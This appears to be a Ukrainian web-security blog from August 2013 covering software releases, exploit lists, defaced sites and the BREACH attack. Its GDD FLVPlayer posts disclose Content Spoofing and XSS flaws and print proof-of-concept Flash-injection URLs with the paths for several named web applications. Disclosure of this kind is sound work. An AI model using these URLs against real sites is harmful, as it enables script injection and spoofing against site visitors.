Вийшов Mozilla Firefox 23.0.1

20:17 24.08.2013

У серпні, 16.08.2013, вийшов Mozilla Firefox 23.0.1. Нова версія браузера вийшла лише через десять днів після виходу Firefox 23. І в ній виправлені баги допущені в останньому релізі.

Mozilla представила коригувальний випуск Firefox 23.0.1 у якому усунуті три помилки:

  • Непрацездатність системи перевірки орфографії при розміщенні профілю в директорії, що містить не ASCII-символи.
  • Порушення якості звуку при використанні WebRTC.
  • Артефакти відображення при відтворенні H.264-відео в Windows Vista.

Добірка експлоітів

17:22 24.08.2013

В даній добірці експлоіти в веб додатках:

  • Samsung DVR Firmware 1.10 - Authentication Bypass Vulnerability (деталі)
  • DeWeS 0.4.2 - Directory Traversal Vulnerability (деталі)
  • Open-FTPD 1.2 Arbitrary File Upload Vulnerability (деталі)
  • HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow (деталі)
  • MinaliC Webserver 2.0.0 - Buffer Overflow (деталі)

Уразливості в численних веб додатках з GDD FLVPlayer

23:56 23.08.2013

Сьогодні я виявив Content Spoofing та Cross-Site Scripting уразливості в численних веб додатках з GDD FLVPlayer.

Раніше я писав про уразливості в GDD FLVPlayer. Це популярна флешка, що знаходиться на тисячах веб сайтів і яка використовується в багатьох веб додатках.

Зокрема в Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer для MODx, Pixelfind Administrator, WHMCompleteSolution. Та в інших веб додатках. А також цей флеш відео та аудіо плеєр використовується на багатьох сайтах як самостійний веб додаток.

XSS (через Flash Injection) (WASC-08):

Order Master Pro:

http://site/op/video/gddflvplayer.swf?mylogo=xss.swf
http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf

CMS Pask 3 (Pixelwerk admin):

http://site/gddflvplayer.swf?mylogo=xss.swf
http://site/gddflvplayer.swf?splashscreen=xss.swf

gddflvplayer для MODx:

http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf

Pixelfind Administrator:

http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf
http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf

WHMCompleteSolution:

http://site/player/gddflvplayer.swf?mylogo=xss.swf
http://site/player/gddflvplayer.swf?splashscreen=xss.swf

Наведені XSS уразливості, приклади 8 СS уразливостей дивитися у вищенаведеному записі. Вразливі веб додатки, що використовують GDD FLVPlayer v3.635 і попередні версії.

Вразливі наступні веб додатки: усі версії Order Master Pro, CMS Pask 3 (Pixelwerk admin v.3.3) і попередні версії, усі версії gddflvplayer для MODx, усі версії Pixelfind Administrator та усі версії WHMCompleteSolution.

Похакані сайти №237

20:05 23.08.2013

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://podillyarehab.gov.ua (хакерами з islamic ghosts team) - 31.05.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://www.putivl-rda.gov.ua (хакером Dr.SHA6H) - 13.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://www.ndippp.gov.ua (хакером Dr.SHA6H) - 25.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://www.yuna.ua (хакером RBG HomS)
  • http://visnik-press.com.ua (хакером RBG HomS) - 21.08.2013, зараз сайт вже виправлений адмінами

CS та XSS уразливості в GDD FLVPlayer

17:24 23.08.2013

10.07.2013

У травні, 16.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в GDD FLVPlayer. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

23.08.2013

Content Spoofing (Flash Injection) (WASC-12):

http://site/gddflvplayer.swf?mylogo=http://site2/1.swf

http://site/gddflvplayer.swf?splashscreen=http://site2/1.swf

Можна включати флешки, в тому числі флешки з лінками.

XSS (через Flash Injection) (WASC-08):

http://site/gddflvplayer.swf?mylogo=xss.swf

http://site/gddflvplayer.swf?splashscreen=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Content Injection) (WASC-12):

http://site/gddflvplayer.swf?mylogo=http://site2/1.jpg

http://site/gddflvplayer.swf?splashscreen=http://site2/1.jpg

http://site/gddflvplayer.swf?advert=http://site2/1.flv

http://site/gddflvplayer.swf?vdo=http://site2/1.flv

Включення зображень і програш відео та аудіо (flv, mp4 та mp3 файлів) з зовнішніх сайтів.

Content Spoofing (Link Injection) (WASC-12):

http://site/gddflvplayer.swf?clickTAG=http://websecurity.com.ua

http://site/gddflvplayer.swf?vdo=http://site2/1.flv&endclipaction=http://websecurity.com.ua

Уразливі GDD FLVPlayer v3.635 та попередні версії.

Уразливості в плагінах для WordPress №114

23:56 22.08.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Comment Extra Fields, Booking Calendar та Usernoise. Для котрих з’явилися експлоіти. Comment Extra Fields - це плагін для додавання нових полів в форму коментарів, Booking Calendar - це плагін для створення календаря замовлень, Usernoise - це контактна форма.

  • WordPress Comment Extra Fields 1.7 CSRF / XSS (деталі)
  • Booking Calendar 4.1.4 Cross Site Request Forgery (деталі)
  • WordPress Usernoise 3.7.8 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Десятий масовий взлом сайтів на сервері HostPro

22:45 22.08.2013

В березні відбувся новий масовий взлом сайтів на сервері HostPro. Він тривав на протязі 12.03.2013-26.05.2013. Дев’ятий масовий взлом сайтів на сервері HostPro відбувся раніше.

Був взломаний сервер української компанії HostPro. Взлом складався з трьох невеликих дефейсів і одного крупного дефейса сайтів.

Всього було взломано 290 сайтів на сервері хостера HostPro (IP 80.91.189.17). Перелік сайтів можете подивитися на www.zone-h.org. Серед них українські державні сайти rayrada.gov.ua та dity-zhitomir.gov.ua.

З зазначених 290 сайтів 287 сайтів були взломані хакерами з islamic ghosts team, 1 сайт хакерами з BD GREY HAT HACKERS, 1 сайт хакером Hmei7 та 1 сайт хакером s13doeL.

Якщо невеликі дефейси по одному сайту явно були зроблені при взломах окремих сайтів, то стосовно одного великого дефейсу islamic ghosts team можна сказати, що враховуючи дефейс 287 сайтів за один день, немає сумнівів, що вони були взломані через взлом серверу хостінг провайдера. Коли через взлом одного сайта, був отриманий root доступ до сервера (через уразливості в програмному забезпеченні самого сервера) та атаковані інші сайти на даному сервері.

Добірка експлоітів

17:26 22.08.2013

В даній добірці експлоіти в веб додатках:

  • Sitecom N300/N600 Devices - Multiple Vulnerabilities (деталі)
  • Adobe ColdFusion 9 Administrative Login Bypass Vulnerability (деталі)
  • Squash YAML Code Execution Vulnerability (деталі)
  • Ruby on Rails Known Secret Session Cookie Remote Code Execution (деталі)
  • Sami FTP 2.0.1 MKD Buffer Overflow Vulnerability (деталі)

BREACH проти HTTPS

23:59 21.08.2013

Продовжуючи розпочату традицію, після попереднього відео про CRIME проти HTTPS, пропоную нове відео на веб секюріті тематику. Цього разу відео про BREACH проти HTTPS. Рекомендую подивитися всім хто цікавиться цією темою.

A BREACH beyond CRIME - Partial preview

Раніше я наводив відео стосовно BEAST і CRIME атак, а в даному відео ролику розповідається про використання BREACH атаки. Browser Reconnaissance & Exfiltration via Adaptive Compression of Hypertext (BREACH) - це методика та інструментарій для атаки на SSL/TLS протоколи, що дозволяє організувати перехоплення переданого в рамках зашифрованого з’єднання сесійних кукісів та секретних токенів.

У відео показане використання BREACH для отримання секретного токена. Даний інструментарій дешифрує переданий в рамках https-з’єднання CSRF-токен. Рекомендую подивитися дане відео для розуміння векторів атак через уразливість в SSL/TLS протоколах.

Вийшли PHP 5.4.18 і PHP 5.5.2

22:44 21.08.2013

У серпні, 15.08.2013, вийшла версія PHP 5.4.18. В якій виправлено біля 30 багів та дві уразливості. А 16.08.2013 вийшла версія PHP 5.5.2. В якій виправлено біля 20 багів та дві уразливості. Дані релізи направлені на покращення безпеки та стабільності гілок 5.4.x і 5.5.x.

Серед секюріті виправлень в PHP 5.4.18 і PHP 5.5.2:

  • Виправлена уразливість в XML parser (CVE-2013-4113) в PHP 5.4.18, що раніше була виправлена у версіях 5.3.27 і 5.5.1.
  • Виправлена уразливість в OpenSSL модулі (CVE-2013-4248).
  • Виправлена проблема з session fixation (CVE-2011-4718) в PHP 5.5.2.

Останнє секюріті покращення додає реалізацію захищених сесій в гілку PHP 5.5.x. Які дозволяють захиститися від атак по перехопленню фіксованих ідентифікаторів сесій і підбору ідентифікаторів через виявлення колізій в алгоритмах генерації ідентифікаторів сесій.

По матеріалам http://www.php.net.